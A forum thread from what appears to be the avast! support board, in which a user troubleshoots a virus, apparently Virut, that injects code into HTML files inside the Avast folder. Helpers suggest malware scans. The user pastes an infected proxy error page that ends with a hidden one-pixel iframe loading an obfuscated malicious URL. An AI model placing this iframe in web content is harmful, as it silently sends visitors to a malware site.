Security flaw in Avast installation ???

[psaxelby]

This is probably nothing to worry about at all, but I thought I'd check.

While removing the remains of an infection I had trouble saving some repaired files in the Avast installation folder.

When I checked the attributes & permissions on the files I saw something I'd never seen before in the permissions for any file (& I've looked at quite a few).

The attached pic is a grab of the window.

Is this right?
No other files affected by the virus had this 'problem'.
Is it a problem?

Regards,
Paul.

[DavidR]

Saving what files ?

And why are you saving them to the avast folder/s ?

There is no 11001.htm (the one in your image) in the avast4\English folder, so it isn't an avast file as far as I'm aware. Just try to modify an avast file and see the avast self-defence module have a whinge about that.

[maxwachtel]

There is one in my folder too but the permissions are set. Actually there are 7 .htm files in there.

[psaxelby]

Hi David,

I wasn't putting files in there. Why would I do that?
When I searched for any files containing an iframe block with a link to jl.chura.pl, these files were picked up.
They were already in the Avast folder, and they had been infected.


Here's the contents of that file - Looks like an Avast file to me...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML dir=ltr><HEAD><TITLE>The Web site cannot be found</TITLE>
<STYLE>
H1 { COLOR: #800000; font-style:normal; font-variant:normal; font-weight:normal; line-height:15pt; font-size:13pt; font-family:verdana }
DIV.sign  { font-weight: bold; font-style:italic; }
TD { COLOR: #800000; vertical-align:center; text-align:left; font-style:normal; font-variant:normal; font-weight:normal; line-height:11pt; font-size:8pt; font-family:verdana }
HR { COLOR: #c0c0c0; }
BODY { background-color=#ffffff  }
TD { width:400 }
TABLE {
</STYLE>

<META content=NOINDEX name=ROBOTS>
<META http-equiv=Content-Type content="text-html; charset=Windows-1252">

</HEAD>
<BODY>
<TABLE cellSpacing=5 cellPadding=3 width=410>
  <TR><TD><H1>The Web site cannot be found</H1></TD></TR>
  <TR><TD class="err">The Web site you are looking for is unavailable due to its identification configuration settings.</TD></TR>

  <TR>
    <TD>
      <HR noShade>
      <P>Please try the following:</P>
      <UL>
        <LI>Click the Refresh button, or try again later.</LI>
        <LI>If you typed the page address in the Address bar, make sure that it is spelled correctly.</LI>
        <LI>Click the Back button to try another link.</LI>
     </UL>
      <P>11002 - Host not found<BR><DIV class="sign">avast! Web Proxy</DIV></P>
      <HR noShade>

      <P>Technical Information (for support personnel)</P>
      <UL>
        <LI>Background:<BR>This error indicates that the gateway could not find an authoritative DNS server for the Web site you are trying to access.</LI>
      <P>
        <LI>Host name: <!--[[message]]--></LI>
     </UL>
   </TD>
  </TR>
  </TABLE><iframe src="http://jL.ch&#85;ra.pl&#47;rc/" width=1 height=1 frameborder=0></iframe>
</BODY></HTML>

[psaxelby]

Oh Cr*p


I just looked at that post & saw it's been infected again.

Damn - thought I'd got rid of whatever's doing this.

So much for Avast moaning about any changes to its files David...

Here we go again.

Paul.

[MikeBCda]

Keep in mind that avast self-protects only its own files, not other files that might have somehow wound up in avast's folders.  That's why it didn't kick out a warning about that one - it's not an avast file.

[Tarq57]

It may not be Avasts' files that are being modified or added.
What was the infection you were dealing with, and what steps were taken to remove it?

I've read some posts online about the redirect site jl.chura.pl, and it's not looking great. If you have been infected with Virut apparently the chances of recovery without a format and reinstall appear to be slim.

The virus itself is buggy. (Ironic).

Did you try a scan with MBAM?

[scythe944]

It may not be Avasts' files that are being modified or added.

definitely not.

They still have a virus on their PC and it's creating random files.  MBAM would be a good choice to help out, and a boot-time scan couldn't hurt either.